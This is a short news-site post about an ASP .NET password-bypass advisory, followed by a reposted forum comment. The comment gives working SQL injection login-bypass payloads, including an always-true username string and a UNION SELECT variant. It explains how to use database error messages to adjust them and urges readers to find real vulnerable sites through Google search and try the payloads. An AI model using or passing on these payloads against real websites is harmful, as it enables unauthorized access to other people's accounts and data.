Microsoft-based web sites have major vulnerability

Posted by Pile (8265 views) Add this story to MyYahoo Add this article to del.icio.us Submit article to Reddit Add story to Furl Add story to StumbleUpon [E-Mail link]


An advisory has been released regarding a vulnerability in Microsoft's ASP .NET technology which apparently allows people to bypass password security on web sites. You might want to worry if you're doing business with a company who uses some of this insecure Microsoft technology for their e-commerce systems. Your personal information may be at risk.



 

comment from slashdot
Posted by Anonymous on 2004-10-07 13:57:48
This is interesting:

What's next: "The cat catches mice" "The pope is catholic" "There were no weapons of mass destruction in Iraq" "Water wets"?

I have news for you: 1 password-protected ASP application out of 3 can be accessed using the username ' or ''='' or ''=' and the empty password (the first and last single quote are part of the username).

Reason: SQL injection.

Supposedly these apps verify the password via a construct equivalent to the following (pseudo-syntax, I don't know enough VB to write real code):

answer = query_execute("SELECT account_id FROM users WHERE username=' "+username+" ' AND password=' "+password+" '");

Yes, they use string concatenation to build the query, rather than using wildcards (bind variables)! Not sure ASP even supports wildcards...

What happens with the magic username above, is that a query such as the following is executed against the database:

SELECT account_id FROM users WHERE username='' or ''='' or ''='' AND password=''

(the part of the query coming from the user-entered data is bold, the rest is what came from the program). This is a query that matches for all rows, so you'll usually get connected using the credentials from the first account in the table (often administrator, he!). Try it out! Go to google, seach for login asp username password [google.com] and pick one of the sites from "the middle of the stack" (i.e. not from the first few pages returned, because those are mostly either ASP tutorials, or the rare "secure" ASP sites). Saying username and password in another language (Benutzername/Passwort) helps too as you'll get a "fresher" less overfished list ;-)

If the simplistic approach doesn't work, try entering a lone single quote as the username and/or password. You'll often get an error message that shows you part of the query used, and from there you can find how to word your username so that you still get access. For instance, some sites do not use the password in the WHERE clause, but instead return it. In that case, use something such as the following as your username, and zozo as the password:

' union select 0,'zozo' from users where ''='

The query obviously neads some tweaking, as the number of columns, position of password in select clause, and names of table obviously varies among sites. But fortunately, error messages are often verbose enough that with a little bit of trial and error you can figure out a "magic" username that opens the door to the kingdom.

If you are a site administrator whose app is vulnerable: rewriting your app is indeed a solution... preferably in PHP!

1 Article displayed.

Pursuant to Section 230 of Title 47 of the United States Code (47 USC § 230), BSAlert is a user-contributed editorial web site and does not endorse any specific content, but merely acts as a "sounding board" for the online community. Any and all quoted material is referenced pursuant to "Fair Use" (17 U.S.C. § 107). Like any information resource, use your own judgement and seek out the facts and research and make informed choices.

Powered by Percleus (c) 2005-2047 - Content Management System

[Percleus 0.9.5] (c) 2005, PCS